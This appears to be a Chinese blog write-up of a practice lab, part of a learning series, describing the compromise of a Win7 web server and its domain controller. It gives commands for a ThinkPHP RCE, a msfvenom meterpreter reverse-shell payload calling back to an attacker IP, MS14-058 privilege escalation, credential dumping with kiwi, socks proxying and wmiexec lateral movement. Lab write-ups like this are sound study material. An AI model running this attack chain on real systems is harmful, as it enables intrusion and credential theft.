无境红日靶场五 wp

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

文章目录

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)------了解成因和手工注入方法
  6. SQL注入(2)------各种注入
  7. SQL注入(3)------SQLMAP
  8. SQL注入(4)------实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)------一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)------各种木马的生成及简单的免杀
  23. MSF(3)------apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 记一次简单的对盗号网站的渗透
  27. 记一次幸运的漏洞挖掘
  28. 内网渗透初探
  29. 记对外国某服务器的内网渗透
  30. 一次丝滑的内网渗透拿下域控
  31. 实战内网PTH上线域控
  32. 通过路由器进行内网渗透
  33. 钓鱼邮件和钓鱼样本
  34. 无境vulntarget-a wp
  35. 无境ZeroLogon 练习 wp
  36. 无境三层综合渗透 wp

一层Win7

WebShell

目标IP:192.168.111.150,用nmap快速扫全端口

bash 复制代码
nmap -p- -T4 --min-rate 2000 -n -Pn 192.168.111.150

重点是80端口的web服务,打开发现是一个Thinkphp

使用利用工具测试,存在ThinkPHP 5.0.22/5.1.29 RCE

用工具一键getshell

Administrator权限的Win7,明显在域中

Msf

用reverse_tcp生成shellcode

bash 复制代码
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.25 lport=6666 -f exe > 1.exe

msfconsole这样子配置

bash 复制代码
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 6666
run

把生成的1.exe放到服务器上运行,成功获取到meterpreter

提权

systeminfo看补丁信息

我靠这么多

考虑使用MS14-058进行提权

bash 复制代码
use exploit/windows/local/ms14_058_track_popup_menu
set payload windows/x64/meterpreter/reverse_tcp
set SESSION 1
set LHOST 192.168.111.25
set target 1
run

成功得到SYSTEM的meterpreter

抓密码

bash 复制代码
load kiwi
bash 复制代码
creds_all

666演都不演了,得到密码为dc123.com

横向

systeminfo查到当前域为sun.com

用meterpreter直接查域控

bash 复制代码
run post/windows/gather/enum_domain

得到域控IP为192.168.138.138

二层域控

一级代理

用autoroute建立一级代理,走192.168.138.0/24

bash 复制代码
run post/multi/manage/autoroute

然后创建socks5代理

bash 复制代码
use auxiliary/server/socks_proxy
run

用proxychain来配置代理,在/etc/proxychain4.conf最后一行加上

bash 复制代码
socks5	127.0.0.1 1080

可以用nc测试代理是否建立成功

bash 复制代码
proxychains nc -zv 192.168.138.138 445

能连通即为成功

wmiexec

直接用psexec横向getshell

bash 复制代码
proxychains impacket-wmiexec SUN/Administrator:'dc123.com'@192.168.138.138

好简单的靶场

相关推荐
Sylvia33.2 小时前
从轮询到推送:足球数据API架构演进与火星数据技术拆解
java·服务器·网络·python·websocket·架构
AmyLin_20013 小时前
PDF 脱敏技术【1】:PDF 脱敏不是盖黑框:为什么敏感信息仍能被复制,正确的保护方式是什么?
安全·pdf·sdk·脱敏·文档安全·pdf 脱敏·智能脱敏
2401_834636993 小时前
从零吃透 K8s 网络:ServiceIngressMetalLB 实操手册
网络·容器·kubernetes
for_ever_love__4 小时前
python基础语法学习: 变量, 输入输出, 运算符
网络·python·学习
hz567894 小时前
视频会议终端品牌如何选择?主流产品特点与选型标准
安全·音视频·实时音视频·信息与通信
huainingning4 小时前
RJ DHCPV6 无状态配置成功案例
网络·智能路由器
恒拓高科WorkPlus5 小时前
从“可选项”到“必选项”——私有化部署即时通讯如何重塑企业协作新底座
大数据·网络·人工智能
云水一下5 小时前
零基础玩转bWAPP靶场(五十一):XSS - Reflected (Login Form)
web安全·xss·bwapp·reflected·login form
蒲公英eric5 小时前
从布尔盲注到参数化查询:DVWA SQL 盲注模块完整漏洞分析教程
sql·web安全·ai·dvwa·ai安全·sql 盲注